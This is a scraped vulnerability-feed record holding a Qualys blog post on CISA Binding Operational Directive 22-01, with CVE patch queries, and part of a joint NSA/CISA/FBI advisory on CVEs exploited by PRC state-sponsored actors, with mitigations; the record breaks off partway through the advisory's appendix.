"qualysblog", "title": "NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-07T20:03:01", "id": "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture1.jpg)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture3.png)\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture4.png)\n\n### Summary Dashboard High Level Structured by Vendor:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture5.png)\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture6.jpg)\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture7.jpg)\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-06-05T18:33:22", "description": "### Summary\n\nThis joint Cybersecurity Advisory (CSA) provides the top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People\u2019s Republic of China (PRC) state-sponsored cyber actors as assessed by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC state-sponsored cyber actors continue to exploit known vulnerabilities to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.\n\nThis joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\n\nNSA, CISA, and FBI urge U.S. and allied governments, critical infrastructure, and private sector organizations to apply the recommendations listed in the Mitigations section and Appendix A to increase their defensive posture and reduce the threat of compromise from PRC state-sponsored malicious cyber actors.\n\nFor more information on PRC state-sponsored malicious cyber activity, see CISA\u2019s [China Cyber Threat Overview and Advisories webpage](<https://www.cisa.gov/uscert/china>), FBI\u2019s [Industry Alerts](<https://www.ic3.gov/Home/IndustryAlerts>), and NSA\u2019s [Cybersecurity Advisories & Guidance](<https://www.nsa.gov/Press-Room/Cybersecurity-Advisories-Guidance/>). \n\nDownload the PDF version of this report: [pdf, 409 KB](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>)\n\n### Technical Details\n\nNSA, CISA, and FBI continue to assess PRC state-sponsored cyber activities as being one of the largest and most dynamic threats to U.S. government and civilian networks. PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques\u2014some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations.\n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target networks of interest. NSA, CISA, and FBI assess PRC state-sponsored cyber actors have actively targeted U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks. See Table 1 for the top used CVEs.\n\n_Table I: Top CVEs most used by Chinese state-sponsored cyber actors since 2020_\n\nVendor\n\n| \n\nCVE\n\n| \n\nVulnerability Type \n \n---|---|--- \n \nApache Log4j\n\n| \n\nCVE-2021-44228\n\n| \n\nRemote Code Execution \n \nPulse Connect Secure\n\n| \n\nCVE-2019-11510\n\n| \n\nArbitrary File Read \n \nGitLab CE/EE\n\n| \n\nCVE-2021-22205\n\n| \n\nRemote Code Execution \n \nAtlassian\n\n| \n\nCVE-2022-26134\n\n| \n\nRemote Code Execution \n \nMicrosoft Exchange\n\n| \n\nCVE-2021-26855\n\n| \n\nRemote Code Execution \n \nF5 Big-IP\n\n| \n\nCVE-2020-5902\n\n| \n\nRemote Code Execution \n \nVMware vCenter Server\n\n| \n\nCVE-2021-22005\n\n| \n\nArbitrary File Upload \n \nCitrix ADC\n\n| \n\nCVE-2019-19781\n\n| \n\nPath Traversal \n \nCisco Hyperflex\n\n| \n\nCVE-2021-1497\n\n| \n\nCommand Line Execution \n \nBuffalo WSR\n\n| \n\nCVE-2021-20090\n\n| \n\nRelative Path Traversal \n \nAtlassian Confluence Server and Data Center\n\n| \n\nCVE-2021-26084\n\n| \n\nRemote Code Execution \n \nHikvision Webserver\n\n| \n\nCVE-2021-36260\n\n| \n\nCommand Injection \n \nSitecore XP\n\n| \n\nCVE-2021-42237\n\n| \n\nRemote Code Execution \n \nF5 Big-IP\n\n| \n\nCVE-2022-1388\n\n| \n\nRemote Code Execution \n \nApache\n\n| \n\nCVE-2022-24112\n\n| \n\nAuthentication Bypass by Spoofing \n \nZOHO\n\n| \n\nCVE-2021-40539\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-26857\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-26858\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-27065\n\n| \n\nRemote Code Execution \n \nApache HTTP Server\n\n| \n\nCVE-2021-41773\n\n| \n\nPath Traversal \n \nThese state-sponsored actors continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access. Many of the CVEs indicated in Table 1 allow the actors to surreptitiously gain unauthorized access into sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks. For additional information on PRC state-sponsored cyber actors targeting network devices, please see [People\u2019s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3055748/nsa-cisa-and-fbi-expose-prc-state-sponsored-exploitation-of-network-providers-d/>).\n\n### Mitigations\n\nNSA, CISA, and FBI urge organizations to apply the recommendations below and those listed in Appendix A.\n\n * Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n * Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices.\n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\n\n## Appendix A\n\n_Table II: Apache CVE-2021-44228_\n\nApache CVE-2021-44228 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nApache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against malicious actor controlled LDAP and other JNDI related endpoints. A malicious actor who can control log messages or log message parameters could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * See vendor\u2019s [Guidance For Preventing, Detecting, and Hunting for Exploitation of the Log4j 2 Vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>). \n \n_Vulnerable Technologies and Versions_\n\nThere are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, check <https://nvd.nist.gov/vuln/detail/CVE-2021-44228>. \n \n_Table III: Pulse CVE-2019-11510_\n\nPulse CVE-2019-11510 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote malicious actor could send a specially crafted URI to perform an arbitrary file reading vulnerability. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * Use CISA\u2019s \u201cCheck Your Pulse\u201d Tool. \n \n_Vulnerable Technologies and Versions_\n\nPulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n \n_Table IV: GitLab CVE-2021-22205_\n\nGitLab CVE-2021-22205 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nAn issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files passed to a file parser, which resulted in a remote command execution. \n \n_Recommended Mitigations_\n\n * Update to 12.10.3, 13.9.6, and 13.8.8 for GitLab.\n * Hotpatch is available via GitLab. \n \n_Detection Methods_\n\n * Investigate logfiles.\n * Check GitLab Workhorse. \n \n_Vulnerable Technologies and Versions_\n\nGitlab CE/EE. \n \n_Table V: Atlassian CVE-2022-26134_\n\nAtlassian CVE-2022-26134 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that could allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, 7.13.0 before 7.13.7, 7.14.0 before 7.14.3, 7.15.0 before 7.15.2, 7.16.0 before 7.16.4, 7.17.0 before 7.17.4, and 7.18.0 before 7.18.1. \n \n_Recommended Mitigations_\n\n * Immediately block all Internet traffic to and from affected products AND apply the update per vendor instructions. \n * Ensure Internet-facing servers are up-to-date and have secure compliance practices. \n * Short term workaround is provided [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAll supported versions of Confluence Server and Data Center\n\nConfluence Server and Data Center versions after 1.3.0 \n \n_Table VI: Microsoft CVE-2021-26855_\n\nMicrosoft CVE-2021-26855 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft has released security updates for Windows Exchange Server. To exploit these vulnerabilities, an authenticated malicious actor could send malicious requests to an affected server. A malicious actor who successfully exploited these vulnerabilities would execute arbitrary code and compromise the affected systems. If successfully exploited, these vulnerabilities could allow an adversary to obtain access to sensitive information, bypass security restrictions, cause a denial of service conditions, and/or perform unauthorized actions on the affected Exchange server, which could aid in further malicious activity. \n \n_Recommended Mitigations_\n\n * Apply the appropriate Microsoft Security Update.\n * Microsoft Exchange Server 2013 Cumulative Update 23 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 18 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 19 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 7 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 8 (KB5000871)\n * Restrict untrusted connections. \n \n_Detection Methods_\n\n * Analyze Exchange product logs for evidence of exploitation.\n * Scan for known webshells. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange 2013, 2016, and 2019. \n \n_Table VII: F5 CVE-2020-5902_\n\nF5 CVE-2020-5902 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. \n \n_Recommended Mitigations_\n\n * Apply FY BIG-IP Update.\n * Restrict access to the configuration utility. \n \n_Detection Methods_\n\n * Use F5\u2019s [CVE-2020-5902 IoC Detection Tool](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>).\n * Additional detection methods can be found at <https://support.f5.com/csp/article/K52145254>. \n \n_Vulnerable Technologies and Versions_\n\nF5 Big-IP Access Policy Manager\n\nF5 Big-IP Advanced Firewall Manager\n\nF5 Big-IP Advanced Web Application Firewall\n\nF5 Big-IP Analytics\n\nF5 Big-IP Application Acceleration Manager\n\nF5 Big-IP Application Security Manager\n\nF5 Big-IP Ddos Hybrid Defender\n\nF5 Big-IP Domain Name System (DNS)\n\nF5 Big-IP Fraud Protection Service (FPS)\n\nF5 Big-IP Global Traffic Manager (GTM)\n\nF5 Big-IP Link Controller\n\nF5 Networks Big-IP Local Traffic Manager (LTM)\n\nF5 Big-IP Policy Enforcement Manager (PEM)\n\nF5 SSL Orchestrator \n \n_References_\n\n<https://support.f5.com/csp/article/K00091341>\n\n<https://support.f5.com/csp/article/K07051153>\n\n<https://support.f5.com/csp/article/K20346072>\n\n<https://support.f5.com/csp/article/K31301245>\n\n<https://support.f5.com/csp/article/K33023560>\n\n<https://support.f5.com/csp/article/K43638305>\n\n<https://support.f5.com/csp/article/K52145254>\n\n<https://support.f5.com/csp/article/K82518062> \n \n_Table VIII: VMware CVE-2021-22005_\n\nVMware CVE-2021-22005 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThe vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. \n \n_Recommended Mitigations_\n\n * Apply Vendor Updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVMware Cloud Foundation\n\nVMware VCenter Server \n \n_Table IX: Citrix CVE-2019-19781_\n\nCitrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n \n_Recommended Mitigations_\n\n * Apply vendor [mitigations](<https://support.citrix.com/article/CTX267679/mitigation-steps-for-cve201919781>).\n * Use the CTX269180 - [CVE-2019-19781 Verification Tool](<https://support.citrix.com/article/CTX269180/cve201919781-verification-tool>) provided by Citrix. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nCitrix ADC, Gateway, and SD-WAN WANOP \n \n_Table X: Cisco CVE-2021-1497_\n\nCisco CVE-2021-1497 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMultiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote malicious actor to perform a command injection against an affected device. For more information about these vulnerabilities, see the Technical details section of this advisory. \n 